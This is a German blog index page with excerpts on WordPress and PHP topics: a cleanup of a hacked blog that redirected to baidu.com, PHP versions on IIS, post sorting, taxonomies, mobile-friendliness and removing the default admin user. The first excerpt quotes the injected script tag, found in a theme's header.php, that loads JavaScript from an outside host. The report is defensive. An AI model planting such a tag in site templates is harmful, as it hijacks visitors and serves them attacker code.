WordPress-Hack behoben: Weiterleitung eines WordPress Blogs zu baidu.com

Fall von heute Vormittag: Rief man die Blogadresse auf, landete man nach einem Redirekt bei einer chinesischen Suchmaschine. Scanner fanden nichts. Die Ursache war in die header.php des Themes eingeschleust worden: <script type="text/javascript" src="http://system-bloglic.com/dl/bloglic_script.js"></script> (auf welchem Weg gilt es noch zu ermitteln, das Theme war schon etwas älter, und mindestens … mehr »
abgelegt unter:

PHP Manager unter IIS 8.5

Die auf Webservern verfügbare PHP-Version kann man sich nicht bei jedem Provider aussuchen. Im schlimmsten Fall muss man noch mit PHP 5.2.17 rechnen, oder 5.3.28. Manchmal weicht die PHP-Version auf der man ein Projekt entwickelt und testet von der Version auf der es später läuft ab. Nicht oft, aber doch … mehr »

WordPress: Wenn das Sortierkriterium an letzter Stelle im Beitragstitel steht

Eine Netzwerkpartnerin betreut seit langer Zeit ein WordPress-Projekt auf dem unter anderem eine Seite mit einer Liste der Mitarbeiter geführt wurde. Enthalten waren Positionen, Kontaktdaten und je ein (floatendes) Bild pro Person. Das alles auf einer Seite war für den Kunden nicht angenehm zu editieren. Da das Blog bisher nicht … mehr »

Der kurze Dienstweg zu Custom Taxonomy Archiven

Dieses Blog (und seine Besucher) musste(n) schon manches Experiment aushalten, um die Alltagstauglichkeit von Ideen rund um WordPress zu testen. Bis vor wenigen Tagen führte ich ein Plugin mit sechs verschiedenen Custom Post Types und sieben Custom Taxonomies (zwei davon für “interne” Verwendung) mit. Die Wiedergabe der Inhalte erfolgte über … mehr »

Mobilfähigkeit von Websites und die Auswirkung auf die Anzeige in Suchergebnissen

Sofern Websites bei Google Webmastertools angemeldet sind, versendet Google seit etwa Anfang des Jahres Nachrichten an Inhaber nicht mobilfähiger Websites mit dem Hinweis, Probleme der mobilen Nutzerfreundlichkeit zu beheben. Das bedeutet, die Website benötigt neue Layout-Dateien, oder im Fall eines CMS ein neues Theme mit «Responsive Design». Damit kann der … mehr »

WordPress: Sicherheitsrisiko admin (ID#1) loswerden

Der Site-Administrator namens admin wurde früher bei WordPress-Installationen automatisch als Standard-User mit der ID #1 erzeugt, und später noch eine Weile vorgeschlagen, als man den Namen bereits frei wählen konnte. Aus Sicherheitsgründen muss heute bei der frischen Installation einer aktuellen WordPress-Version ein Administrator-Name definiert werden. Aber es gibt noch zahlreiche … mehr »
abgelegt unter: